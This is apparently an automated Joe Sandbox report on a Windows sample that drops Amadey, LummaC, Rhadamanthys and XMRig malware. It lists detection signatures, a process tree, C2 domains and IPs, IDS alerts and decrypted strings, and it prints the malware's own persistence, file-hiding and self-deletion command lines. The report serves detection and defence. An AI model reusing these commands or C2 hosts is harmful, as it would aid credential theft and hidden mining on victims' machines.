Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1577193
MD5:4072633a022e6587009b5ca189ff4613
SHA1:d54d3cf0878186b3b8230f1f0b8188bf1bcd738e
SHA256:003b43813ec5522429efc587a873871a2d6fc14c4c9c6008a7d27bce0920db19
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7816 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4072633A022E6587009B5CA189FF4613)
    • skotes.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 4072633A022E6587009B5CA189FF4613)
  • skotes.exe (PID: 6840 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 4072633A022E6587009B5CA189FF4613)
    • d2cb36d600.exe (PID: 2508 cmdline: "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • d2cb36d600.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • d2cb36d600.exe (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
    • 95ae71a780.exe (PID: 2884 cmdline: "C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 3832 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 4452 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 4424 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7076 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4536 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 8044 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4940 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7988 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4352 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 8020 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 7828 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 7848 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 7832 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7868 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7884 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7912 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 5196 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 80f68847d3.exe (PID: 7252 cmdline: "C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe" MD5: BD7AFE46E12BF9F5E618CA61FE125634)
      • svchost.exe (PID: 7564 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WerFault.exe (PID: 6488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 9f237e29d5.exe (PID: 1068 cmdline: "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
      • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 9f237e29d5.exe (PID: 3060 cmdline: "C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
  • Intel_PTT_EK_Recertification.exe (PID: 1448 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 6744 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 1344 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5688 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["pancakedipyps.click", "sustainskelet.lat", "discokeyus.lat", "rapeflowwj.lat", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat"], "Build id": "nheapcorruption--"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000029.00000003.2360437408.00000000029F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000025.00000002.2341019039.0000000000526000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000023.00000003.2350989316.0000000001240000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            00000006.00000003.2004346887.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000025.00000002.2341019039.000000000050A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 27 entries
                SourceRuleDescriptionAuthorStrings
                0.2.file.exe.890000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  35.3.80f68847d3.exe.57c0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    41.3.svchost.exe.5010000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      35.3.80f68847d3.exe.55a0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        41.3.svchost.exe.4df0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                          Click to see the 11 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 7848, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7884, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 7848, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7884, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe, ParentProcessId: 7252, ParentProcessName: 80f68847d3.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7564, ProcessName: svchost.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 7848, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 7912, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exe, ParentProcessId: 7252, ParentProcessName: 80f68847d3.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7564, ProcessName: svchost.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:17.329177+010020283713Unknown Traffic192.168.2.849713104.21.23.76443TCP
                          2024-12-18T09:07:19.408774+010020283713Unknown Traffic192.168.2.849715104.21.23.76443TCP
                          2024-12-18T09:07:21.773714+010020283713Unknown Traffic192.168.2.849716104.21.23.76443TCP
                          2024-12-18T09:07:24.062217+010020283713Unknown Traffic192.168.2.849717104.21.23.76443TCP
                          2024-12-18T09:07:26.685085+010020283713Unknown Traffic192.168.2.849718104.21.23.76443TCP
                          2024-12-18T09:07:29.695338+010020283713Unknown Traffic192.168.2.849721104.21.23.76443TCP
                          2024-12-18T09:07:32.807815+010020283713Unknown Traffic192.168.2.849722104.21.23.76443TCP
                          2024-12-18T09:07:38.095804+010020283713Unknown Traffic192.168.2.849725104.21.23.76443TCP
                          2024-12-18T09:07:44.774360+010020283713Unknown Traffic192.168.2.849727172.67.179.109443TCP
                          2024-12-18T09:07:46.767356+010020283713Unknown Traffic192.168.2.849728172.67.179.109443TCP
                          2024-12-18T09:07:49.409802+010020283713Unknown Traffic192.168.2.849730172.67.179.109443TCP
                          2024-12-18T09:07:51.624887+010020283713Unknown Traffic192.168.2.849732172.67.179.109443TCP
                          2024-12-18T09:07:54.131066+010020283713Unknown Traffic192.168.2.849734172.67.179.109443TCP
                          2024-12-18T09:07:57.092063+010020283713Unknown Traffic192.168.2.849736172.67.179.109443TCP
                          2024-12-18T09:07:59.595987+010020283713Unknown Traffic192.168.2.849737172.67.179.109443TCP
                          2024-12-18T09:08:02.921885+010020283713Unknown Traffic192.168.2.849740172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:18.080280+010020546531A Network Trojan was detected192.168.2.849713104.21.23.76443TCP
                          2024-12-18T09:07:20.152865+010020546531A Network Trojan was detected192.168.2.849715104.21.23.76443TCP
                          2024-12-18T09:07:38.814729+010020546531A Network Trojan was detected192.168.2.849725104.21.23.76443TCP
                          2024-12-18T09:07:45.506236+010020546531A Network Trojan was detected192.168.2.849727172.67.179.109443TCP
                          2024-12-18T09:07:47.739835+010020546531A Network Trojan was detected192.168.2.849728172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:18.080280+010020498361A Network Trojan was detected192.168.2.849713104.21.23.76443TCP
                          2024-12-18T09:07:45.506236+010020498361A Network Trojan was detected192.168.2.849727172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:20.152865+010020498121A Network Trojan was detected192.168.2.849715104.21.23.76443TCP
                          2024-12-18T09:07:47.739835+010020498121A Network Trojan was detected192.168.2.849728172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:44.774360+010020583651Domain Observed Used for C2 Detected192.168.2.849727172.67.179.109443TCP
                          2024-12-18T09:07:46.767356+010020583651Domain Observed Used for C2 Detected192.168.2.849728172.67.179.109443TCP
                          2024-12-18T09:07:49.409802+010020583651Domain Observed Used for C2 Detected192.168.2.849730172.67.179.109443TCP
                          2024-12-18T09:07:51.624887+010020583651Domain Observed Used for C2 Detected192.168.2.849732172.67.179.109443TCP
                          2024-12-18T09:07:54.131066+010020583651Domain Observed Used for C2 Detected192.168.2.849734172.67.179.109443TCP
                          2024-12-18T09:07:57.092063+010020583651Domain Observed Used for C2 Detected192.168.2.849736172.67.179.109443TCP
                          2024-12-18T09:07:59.595987+010020583651Domain Observed Used for C2 Detected192.168.2.849737172.67.179.109443TCP
                          2024-12-18T09:08:02.921885+010020583651Domain Observed Used for C2 Detected192.168.2.849740172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:16.245823+010020446961A Network Trojan was detected192.168.2.849712185.215.113.4380TCP
                          2024-12-18T09:07:28.376125+010020446961A Network Trojan was detected192.168.2.849719185.215.113.4380TCP
                          2024-12-18T09:07:36.857153+010020446961A Network Trojan was detected192.168.2.849723185.215.113.4380TCP
                          2024-12-18T09:07:44.940259+010020446961A Network Trojan was detected192.168.2.849726185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:43.181645+010020583641Domain Observed Used for C2 Detected192.168.2.8559211.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:42.955483+010020583781Domain Observed Used for C2 Detected192.168.2.8545121.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:30.441203+010020480941Malware Command and Control Activity Detected192.168.2.849721104.21.23.76443TCP
                          2024-12-18T09:07:59.604881+010020480941Malware Command and Control Activity Detected192.168.2.849737172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:06.026327+010028561471A Network Trojan was detected192.168.2.849709185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:14.901476+010028561221A Network Trojan was detected185.215.113.4380192.168.2.849710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T09:07:11.028065+010028033053Unknown Traffic192.168.2.84971131.41.244.1180TCP
                          2024-12-18T09:07:17.690884+010028033053Unknown Traffic192.168.2.84971431.41.244.1180TCP
                          2024-12-18T09:07:29.827789+010028033053Unknown Traffic192.168.2.84972031.41.244.1180TCP
                          2024-12-18T09:07:38.307666+010028033053Unknown Traffic192.168.2.84972431.41.244.1180TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeAvira: detected
                          Source: http://185.215.113.43/Zu7JuNko/index.php$vAvira URL Cloud: Label: malware
                          Source: http://185.215.113.43/Zu7JuNko/index.phpcAAvira URL Cloud: Label: malware
                          Source: http://185.215.113.43/Zu7JuNko/index.phpncoded1Avira URL Cloud: Label: malware
                          Source: http://185.215.113.43/Zu7JuNko/index.php4001Avira URL Cloud: Label: malware
                          Source: http://31.41.244.11/files/dodo/random.exeAvira URL Cloud: Label: phishing
                          Source: http://31.41.244.11/files/fate/random.exe/CAvira URL Cloud: Label: phishing
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                          Source: 00000006.00000003.2004346887.0000000004FD0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: d2cb36d600.exe.2508.8.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["pancakedipyps.click", "sustainskelet.lat", "discokeyus.lat", "rapeflowwj.lat", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "crosshuaht.lat"], "Build id": "nheapcorruption--"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 66%
                          Source: file.exeVirustotal: Detection: 55%Perma Link
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1016853001\80f68847d3.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                          Source: 0000002F.00000002.2618170760.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--6989783370
